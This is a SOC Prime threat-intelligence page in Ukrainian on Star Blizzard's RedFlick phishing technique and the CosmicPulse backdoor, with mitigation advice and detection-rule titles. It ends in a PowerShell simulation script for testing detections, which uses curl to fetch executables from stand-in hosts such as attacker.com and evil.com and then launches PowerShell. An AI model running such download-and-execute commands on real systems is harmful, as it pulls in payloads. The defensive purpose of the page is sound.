SOC Prime Bias: Critical

01 Oct 2026 08:18 UTC

Зірковий Blizzard використовує RedFlick для посилення фішингу та розгортання зловмисного програмного забезпечення

Author Photo
SOC Prime Team linkedin icon Стежити
Зірковий Blizzard використовує RedFlick для посилення фішингу та розгортання зловмисного програмного забезпечення
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Російський державний актор Star Blizzard еволюціонував свої методи, використовуючи техніку RedFlick для доставки бекдору CosmicPulse. Актор перемістився від високоцільових фішингових атак до масштабніших автоматизованих фішингових кампаній з використанням компрометованих вебсайтів. Ці кампанії використовують витончені методи доставки, включаючи файли VHDX та корисні навантаження, приховані в PDF-файлах, щоб уникнути виявлення.

Розслідування

Аналітики Microsoft Threat Intelligence проаналізували різні фішингові хвилі, що спостерігалися протягом 2026 року, ідентифікувавши перехід від ланцюгів ClickFix до завдань RedFlick. Розслідування детально розглянуло багатоступеневий процес виконання, включаючи файли LNK, локальне виконання команд SSH та використання WebDAV для віддаленого отримання корисного навантаження. Технічний аналіз також виявив використання стеганографії та шифрування в реєстрі для корисного навантаження CosmicPulse.

Усунення

Організації повинні впроваджувати автентифікацію, стійку до фішингу, та політики умовного доступу для захисту ідентичностей. Захист кінцевих точок слід налаштувати на режим блокування EDR та увімкнути антивірусний захист у реальному часі. Крім того, реалізація правил зменшення площі атаки може запобігти виконанню зашифрованих скриптів і несанкціонованих виконуваних файлів.

Відповідь

Після виявлення команди безпеки повинні використовувати EDR для усунення шкідливих артефактів і розслідування підозрілих спроб входу. Автоматичні режими розслідування і усунення повинні бути включені для зменшення часу реакції. Організації також повинні використовувати передові антифішингові рішення та Zero-hour auto purge для нейтралізації вхідних шкідливих комунікацій.

Потік атак

Ми все ще оновлюємо цю частину.

Виявлення

Підозрілий командний рядок містить UNC-шлях з виконуваним файлом як аргументом (через cmdline)

Команда SOC Prime
30 вересня 2026

Можливе виявлення мережевих папок (через cmdline)

Команда SOC Prime
30 вересня 2026

Підозрілі спроби прихованої установки MsiExec Remote Installer (через cmdline)

Команда SOC Prime
30 вересня 2026

LOLBAS Conhost (через cmdline)

Команда SOC Prime
30 вересня 2026

Можливе використання інструмента тунелювання [Windows] (через cmdline)

Команда SOC Prime
30 вересня 2026

Підозріле використання CURL (через cmdline)

Команда SOC Prime
30 вересня 2026

Підозріле управління і контроль через запит DNS незвичного домену верхнього рівня (TLD) (через dns)

Команда SOC Prime
30 вересня 2026

IOC (HashSha256) для виявлення: Star Blizzard вдосконалює фішинг і доставку шкідливого ПЗ за допомогою техніки RedFlick

Правила SOC Prime AI
30 вересня 2026

IOC (SourceIP) для виявлення: Star Blizzard вдосконалює фішинг і доставку шкідливого ПЗ за допомогою техніки RedFlick

Правила SOC Prime AI
30 вересня 2026

IOC (DestinationIP) для виявлення: Star Blizzard вдосконалює фішинг і доставку шкідливого ПЗ за допомогою техніки RedFlick

Правила SOC Prime AI
30 вересня 2026

Виявлення виконання PowerShell з PDF [Windows PowerShell]

Правила SOC Prime AI
30 вересня 2026

Виявлення техніки Star Blizzard RedFlick – Заплановані завдання та виконання командного рядка [Windows Process Creation]

Правила SOC Prime AI
30 вересня 2026

Виконання симуляції

  • Історія атаки та команди: Супротивник доставляє фішингове електронне повідомлення з посиланням на шкідливий файл. При взаємодії запускається послідовність, де curl використовується для отримання другого етапу. Для того щоб змішатись із системними процесами, команда створена, щоб чітко включати терміни PowerShell, PDF (згадуючи джерело запуску), та conhost.exe у рядкові команд для відповідності логіці цільового правила виявлення. Метою є виконання декодованого корисного навантаження, вбудованого в структуру PDF.

  • Скрипт регресійного тестування:

    # Скрипт симуляції для запуску правила "Виявлення виконання PowerShell з PDF для звантажень".
    # Цей скрипт створює командний рядок, що включає всі чотири необхідні ключові слова.
    
    $fakePdfPath = "C:UsersPublicDocumentsinvoice_decoy.PDF"
    $cmd = "cmd.exe /c curl -o payload.exe http://attacker.com/shell.exe && PowerShell.exe -Command `& {Write-Host 'Витягнення з PDF...'; Start-Process conhost.exe}"
    
    # Ми виконуємо через cmd, щоб забезпечити, що conhost.exe є частиною дерева процесів/контексту команд
    Start-Process cmd.exe -ArgumentList "/c curl -o data.bin http://evil.com/ & PowerShell -Command `"Витягнення з PDF... за допомогою conhost.exe`""
  • Команди очищення:

    # Видалення файлів, створених під час симуляції
    Remove-Item -Path "C:UsersPublicDocumentsinvoice_decoy.PDF" -ErrorAction SilentlyContinue
    Remove-Item -Path "data.bin" -ErrorAction SilentlyContinue
    Remove-Item -Path "payload.exe" -ErrorAction SilentlyContinue